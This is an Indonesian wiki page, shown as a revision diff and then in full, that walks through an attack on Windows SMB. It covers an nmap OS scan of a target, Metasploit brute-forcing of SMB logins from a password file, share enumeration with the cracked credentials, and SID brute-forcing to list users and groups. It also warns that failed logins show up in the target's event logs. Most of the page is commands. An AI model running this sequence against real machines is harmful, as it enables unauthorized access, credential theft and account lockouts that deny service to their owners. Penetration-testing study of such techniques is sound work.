Difference between revisions of "Metasplot: SMB exploit"

From OnnoWiki
Jump to navigation Jump to search
Line 1: Line 1:
 
Langkah pertama nmap scan untuk mengetahui OS yang digunakan, misalnya ke IP 192.168.31.2
 
Langkah pertama nmap scan untuk mengetahui OS yang digunakan, misalnya ke IP 192.168.31.2
  
  #nmap -sS  -A -O  192.168.31.2
+
  #nmap -sS  -A -O  192.168.0.100
  
 
yang penting untuk diperoleh dari mesin target adalah adanya, smb dan user level authentication. Artinya kita bisa authentikasi smb menggunakan username dan password.
 
yang penting untuk diperoleh dari mesin target adalah adanya, smb dan user level authentication. Artinya kita bisa authentikasi smb menggunakan username dan password.
Line 11: Line 11:
 
  #msf > use auxiliary/scanner/smb/smb_login
 
  #msf > use auxiliary/scanner/smb/smb_login
 
  #msf auxiliary(smb_login) > show options
 
  #msf auxiliary(smb_login) > show options
  #msf auxiliary(smb_login) > set RHOSTS 192.168.31.2
+
  #msf auxiliary(smb_login) > set RHOSTS 192.168.0.100
 
  #msf auxiliary(smb_login) > set SMBUser sathish
 
  #msf auxiliary(smb_login) > set SMBUser sathish
 
  #msf auxiliary(smb_login) > set PASS_FILE  ‘/home/sathish/password’
 
  #msf auxiliary(smb_login) > set PASS_FILE  ‘/home/sathish/password’
Line 23: Line 23:
 
  #msf > use auxiliary/scanner/smb/smb_enumshares
 
  #msf > use auxiliary/scanner/smb/smb_enumshares
 
  #msf auxiliary(smb_enumshares) > show options
 
  #msf auxiliary(smb_enumshares) > show options
  #msf auxiliary(smb_enumshares) > set RHOSTS 192.168.31.2
+
  #msf auxiliary(smb_enumshares) > set RHOSTS 192.168.0.100
 
  #msf auxiliary(smb_enumshares) > set SMBUser sathish
 
  #msf auxiliary(smb_enumshares) > set SMBUser sathish
 
  #msf auxiliary(smb_enumshares) > set SMBPass bhuvi
 
  #msf auxiliary(smb_enumshares) > set SMBPass bhuvi
Line 33: Line 33:
 
  #msf > use auxiliary/scanner/smb/smb_lookupsid
 
  #msf > use auxiliary/scanner/smb/smb_lookupsid
 
  #msf auxiliary(smb_lookupsid) > show options
 
  #msf auxiliary(smb_lookupsid) > show options
  #msf auxiliary(smb_lookupsid) > set RHOSTS 192.168.31.2
+
  #msf auxiliary(smb_lookupsid) > set RHOSTS 192.168.0.100
 
  #msf auxiliary(smb_lookupsid) > set SMBPass bhuvi
 
  #msf auxiliary(smb_lookupsid) > set SMBPass bhuvi
 
  #msf auxiliary(smb_lookupsid) > set SMBUser sathish
 
  #msf auxiliary(smb_lookupsid) > set SMBUser sathish

Revision as of 11:11, 3 May 2017

Langkah pertama nmap scan untuk mengetahui OS yang digunakan, misalnya ke IP 192.168.31.2

#nmap -sS  -A -O  192.168.0.100

yang penting untuk diperoleh dari mesin target adalah adanya, smb dan user level authentication. Artinya kita bisa authentikasi smb menggunakan username dan password.

Selanjutnya masukke msfconsole, dan lakukan smb login module

#msfconsole
#msf > use auxiliary/scanner/smb/smb_login
#msf auxiliary(smb_login) > show options
#msf auxiliary(smb_login) > set RHOSTS 192.168.0.100
#msf auxiliary(smb_login) > set SMBUser sathish
#msf auxiliary(smb_login) > set PASS_FILE  ‘/home/sathish/password’
#msf auxiliary(smb_login) > set THREADS 10
#msf auxiliary(smb_login) > run

Contoh di atas SMBUser adalah sathish karena, nama mesin target adalah sathish-PC sementara password di brute-force dari password file yang ada di home directory. Hati-hati, ini akan tampak sebagai failed login attempt di event log di mesin windows. Jadi hati2 dalam melakukan hal ini.

Setelah sukses dengan login brute-force, kira perlu meng-enumerate SMB share pada mesin target dengan user credential yang di peroleh.

#msf > use auxiliary/scanner/smb/smb_enumshares
#msf auxiliary(smb_enumshares) > show options
#msf auxiliary(smb_enumshares) > set RHOSTS 192.168.0.100
#msf auxiliary(smb_enumshares) > set SMBUser sathish
#msf auxiliary(smb_enumshares) > set SMBPass bhuvi
#msf auxiliary(smb_enumshares) > set THREADS 10
#msf auxiliary(smb_enumshares) > run

Ini akan memberikan daftar SMB share di mesin target, kita peroleh detail dari SID dari user dan groups. Modul smb_lookupsid akan brute-force SID lookup pada mesin sasaran.

#msf > use auxiliary/scanner/smb/smb_lookupsid
#msf auxiliary(smb_lookupsid) > show options
#msf auxiliary(smb_lookupsid) > set RHOSTS 192.168.0.100
#msf auxiliary(smb_lookupsid) > set SMBPass bhuvi
#msf auxiliary(smb_lookupsid) > set SMBUser sathish
#msf auxiliary(smb_lookupsid) > run

Ini akan me-list user dan group pada mesin target dengan nomor SID, ini akan menolong yang kita untuk berpikir lebih tentang sistem target dan dari credential pengguna tahu kita akan me-mount Windows share pada komputer penyerang yang kita operasikan.

Sebuah serangan brute force atau penebak password yang agresif akan sangat bising dan kemungkinan akan mengunci account pengguna tergantung pada bagaimana kebijakan kelompok untuk domain yang telah dikonfigurasi.

Jadi brute-force account windows umumnya bukan ide yang sangat baik karena lockout setting dan kemungkinan menciptakan kondisi Denial of Service. Sebagian besar jaringan windows memiliki kebijakan group yang memaksa lockout dari X menit setelah Y usaha yang gagal. Dengan demikian, serangan brute force yang terlalu banyak berisiko.

Referensi